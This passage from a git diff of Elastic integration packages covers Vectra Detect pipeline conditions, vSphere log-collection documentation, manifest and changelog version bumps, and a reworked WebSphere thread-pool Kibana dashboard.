instanceof List processor: convert: field: _ingest._value.id @@ -459,7 +459,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: date: field: _ingest._value.lastSeen @@ -469,7 +469,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -483,7 +483,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory @@ -491,7 +491,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List ignore_missing: true processor: append: @@ -500,7 +500,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: remove: field: diff --git a/packages/vectra_detect/manifest.yml b/packages/vectra_detect/manifest.yml index 1bedcc3cac5..22cc96ebfea 100644 --- a/packages/vectra_detect/manifest.yml +++ b/packages/vectra_detect/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: vectra_detect title: Vectra Detect -version: "1.7.1" +version: "1.8.0" source: license: Elastic-2.0 description: Collect logs from Vectra Detect with Elastic Agent. diff --git a/packages/vsphere/_dev/build/docs/README.md b/packages/vsphere/_dev/build/docs/README.md index 3876f9c846e..850f6c08982 100644 --- a/packages/vsphere/_dev/build/docs/README.md +++ b/packages/vsphere/_dev/build/docs/README.md @@ -35,7 +35,7 @@ Datastores are logical containers, analogous to file systems, that hide specific ## Logs -To access the logs, from the Kibana UI, you have to specify the network-accessible IP address of the host where the Elastic Agent will be deployed. +To collect logs, a syslog daemon is used. First, you must configure the listening host/IP address (default: localhost) and host port (default: 9525) in the integration. Then, configure vSphere to send logs to a remote syslog host and provide the configured hostname/IP and port of the Elastic Agent host. ### vSphere Logs diff --git a/packages/vsphere/changelog.yml b/packages/vsphere/changelog.yml index 36559d75bae..f2215beb46b 100644 --- a/packages/vsphere/changelog.yml +++ b/packages/vsphere/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.11.1" + changes: + - description: Add more specific details to vSphere logs configuration documentation. + type: enhancement + link: https://github.com/elastic/integrations/pull/8869 +- version: "1.11.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 1.10.1 changes: - description: Update details on vSphere logs configuration. diff --git a/packages/vsphere/docs/README.md b/packages/vsphere/docs/README.md index 22f7f2db24f..2a52cce654b 100644 --- a/packages/vsphere/docs/README.md +++ b/packages/vsphere/docs/README.md @@ -441,7 +441,7 @@ An example event for `datastore` looks as following: ## Logs -To access the logs, from the Kibana UI, you have to specify the network-accessible IP address of the host where the Elastic Agent will be deployed. +To collect logs, a syslog daemon is used. First, you must configure the listening host/IP address (default: localhost) and host port (default: 9525) in the integration. Then, configure vSphere to send logs to a remote syslog host and provide the configured hostname/IP and port of the Elastic Agent host. ### vSphere Logs diff --git a/packages/vsphere/manifest.yml b/packages/vsphere/manifest.yml index 30e732e84a4..c9bcf9b849f 100644 --- a/packages/vsphere/manifest.yml +++ b/packages/vsphere/manifest.yml @@ -1,7 +1,7 @@ title: VMware vSphere -format_version: "3.0.0" +format_version: "3.0.2" name: vsphere -version: "1.10.1" +version: "1.11.1" description: This Elastic integration collects metrics and logs from vSphere/vCenter servers type: integration categories: @@ -9,7 +9,7 @@ categories: - virtualization conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: @@ -61,6 +61,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: true show_user: true diff --git a/packages/websphere_application_server/changelog.yml b/packages/websphere_application_server/changelog.yml index 14b45d62ee3..26131b7df3d 100644 --- a/packages/websphere_application_server/changelog.yml +++ b/packages/websphere_application_server/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: 1.3.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.2.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.2.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.1.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 1.1.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json index d8146c9e20c..2d7534710b3 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04.json @@ -1,327 +1,993 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"1823c9ec-6346-4b88-9295-a75f2f74730d\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"ThreadPool Name\",\"fieldName\":\"websphere_application_server.threadpool.name\",\"id\":\"1823c9ec-6346-4b88-9295-a75f2f74730d\",\"enhancements\":{}}}}" + "id": "websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMSwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"1823c9ec-6346-4b88-9295-a75f2f74730d\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"ThreadPool Name\",\"fieldName\":\"websphere_application_server.threadpool.name\",\"id\":\"1823c9ec-6346-4b88-9295-a75f2f74730d\",\"enhancements\":{}}}}" + }, + "description": "ThreadPool dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693": { + "columnOrder": [ + "7a5b1405-0e12-4508-82c5-9ffa9ba35996", + "c4075f33-09c9-4c38-af7e-190f5b70398e", + "816bda95-3cd2-410e-b17c-8ba494196cf4" + ], + "columns": { + "7a5b1405-0e12-4508-82c5-9ffa9ba35996": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "816bda95-3cd2-410e-b17c-8ba494196cf4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.stopped.declared: *" + }, + "isBucketed": false, + "label": "Declared Stopped Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.stopped.declared" + }, + "c4075f33-09c9-4c38-af7e-190f5b70398e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "816bda95-3cd2-410e-b17c-8ba494196cf4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.stopped.declared : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "816bda95-3cd2-410e-b17c-8ba494196cf4" + ], + "layerId": "5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "c4075f33-09c9-4c38-af7e-190f5b70398e", + "xAccessor": "7a5b1405-0e12-4508-82c5-9ffa9ba35996" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Declared Stopped Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "type": "index-pattern" + } + ] + } }, - "description": "ThreadPool dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "gridData": { + "h": 10, + "i": "b007e627-23d4-4328-b064-3877c40ca3c3", + "w": 23, + "x": 0, + "y": 0 + }, + "panelIndex": "b007e627-23d4-4328-b064-3877c40ca3c3", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0": { + "columnOrder": [ + "2f965609-8b37-4e4d-9e83-20ef0901e869", + "6bd7c586-e630-4880-adb8-d82a050bda0c", + "83043110-a317-4821-8372-79219d3eae1e" + ], + "columns": { + "2f965609-8b37-4e4d-9e83-20ef0901e869": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Server Address", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "server.address" + }, + "6bd7c586-e630-4880-adb8-d82a050bda0c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "ThreadPool Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "83043110-a317-4821-8372-79219d3eae1e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total: *" + }, + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.total" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total : * " + }, + "visualization": { + "columns": [ + { + "columnId": "2f965609-8b37-4e4d-9e83-20ef0901e869", + "isTransposed": false + }, + { + "columnId": "6bd7c586-e630-4880-adb8-d82a050bda0c", + "isTransposed": false + }, + { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "isTransposed": false + } + ], + "layerId": "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + "sorting": { + "columnId": "83043110-a317-4821-8372-79219d3eae1e", + "direction": "desc" } - } + } + }, + "title": "Total Threads in Thread Pool [Metrics WebSphere Application Server]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 15, + "i": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", + "w": 25, + "x": 23, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} + "panelIndex": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "8d78bbff-634f-4aff-9c25-d3f211b564eb": { + "columnOrder": [ + "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d", + "55c60233-3c4c-4db2-b414-dc40ada3b503", + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" + ], + "columns": { + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total: *" + }, + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.total" + }, + "55c60233-3c4c-4db2-b414-dc40ada3b503": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.total : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 10, - "i": "b007e627-23d4-4328-b064-3877c40ca3c3", - "w": 23, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "b007e627-23d4-4328-b064-3877c40ca3c3", - "panelRefName": "panel_b007e627-23d4-4328-b064-3877c40ca3c3", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "w": 25, - "x": 23, - "y": 0 + "layers": [ + { + "accessors": [ + "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" + ], + "layerId": "8d78bbff-634f-4aff-9c25-d3f211b564eb", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "55c60233-3c4c-4db2-b414-dc40ada3b503", + "xAccessor": "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "panelRefName": "panel_d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "f087d207-2453-4b0e-a31f-43ee8d5528c4", - "w": 23, - "x": 0, - "y": 10 + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "f087d207-2453-4b0e-a31f-43ee8d5528c4", - "panelRefName": "panel_f087d207-2453-4b0e-a31f-43ee8d5528c4", - "type": "lens", - "version": "8.3.0" + "yRightExtent": { + "mode": "full" + } + } }, - { - "embeddableConfig": { - "enhancements": {} + "title": "Total Threads[Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 12, + "i": "f087d207-2453-4b0e-a31f-43ee8d5528c4", + "w": 23, + "x": 0, + "y": 10 + }, + "panelIndex": "f087d207-2453-4b0e-a31f-43ee8d5528c4", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "1decd051-dbf6-4a80-aa20-85278fedc2d4": { + "columnOrder": [ + "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e", + "cce82f91-3637-4406-8633-bcd5bfe8a984", + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" + ], + "columns": { + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.active: *" + }, + "isBucketed": false, + "label": "Active Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.active" + }, + "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cce82f91-3637-4406-8633-bcd5bfe8a984": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2b1baf93-2b7f-430d-9048-f11cb2bfb65e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.active : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" + ], + "layerId": "1decd051-dbf6-4a80-aa20-85278fedc2d4", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "cce82f91-3637-4406-8633-bcd5bfe8a984", + "xAccessor": "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 12, - "i": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "w": 25, - "x": 23, - "y": 15 + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "panelRefName": "panel_9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "type": "lens", - "version": "8.3.0" + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { - "columnOrder": [ - "ea4d6628-e862-4e42-a8f3-59572a45894e", - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "columns": { - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { - "dataType": "number", - "isBucketed": false, - "label": "Median of websphere_application_server.threadpool.total.create", - "operationType": "median", - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.create" - }, - "b093e53a-a7e7-4b74-af63-b3da68cf3989": { - "dataType": "number", - "isBucketed": false, - "label": "Median of websphere_application_server.threadpool.total.destroy", - "operationType": "median", - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.destroy" - }, - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "ea4d6628-e862-4e42-a8f3-59572a45894e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Active Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 12, + "i": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", + "w": 25, + "x": 23, + "y": 15 + }, + "panelIndex": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { + "columnOrder": [ + "ea4d6628-e862-4e42-a8f3-59572a45894e", + "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "b093e53a-a7e7-4b74-af63-b3da68cf3989" + ], + "columns": { + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.created: *" + }, + "isBucketed": false, + "label": "Threads Created", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.total.created" + }, + "b093e53a-a7e7-4b74-af63-b3da68cf3989": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.destroyed: *" + }, + "isBucketed": false, + "label": "Threads Destroyed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.total.destroyed" + }, + "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.create : * and websphere_application_server.threadpool.total.destroy : * " + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {} + "ea4d6628-e862-4e42-a8f3-59572a45894e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.total.created : * or websphere_application_server.threadpool.total.destroyed : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 17, - "i": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "w": 23, - "x": 0, - "y": 22 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "panelRefName": "panel_30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 12, - "i": "52f44709-7bc3-4886-8a11-75e785a3816f", - "w": 25, - "x": 23, - "y": 27 + "layers": [ + { + "accessors": [ + "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", + "b093e53a-a7e7-4b74-af63-b3da68cf3989" + ], + "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", + "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "52f44709-7bc3-4886-8a11-75e785a3816f", - "panelRefName": "panel_52f44709-7bc3-4886-8a11-75e785a3816f", - "type": "lens", - "version": "8.3.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 - }, - "timeFrom": "now-15m", - "timeRestore": true, - "timeTo": "now", - "title": "[Metrics WebSphere Application Server] ThreadPool", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-381af9f0-bae2-11ec-b244-51e5cddeab04", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-43d23d70-baed-11ec-b244-51e5cddeab04", - "name": "b007e627-23d4-4328-b064-3877c40ca3c3:panel_b007e627-23d4-4328-b064-3877c40ca3c3", - "type": "lens" - }, - { - "id": "websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04", - "name": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c:panel_d7e182d4-6f2b-4e48-9985-4bfd9d792d0c", - 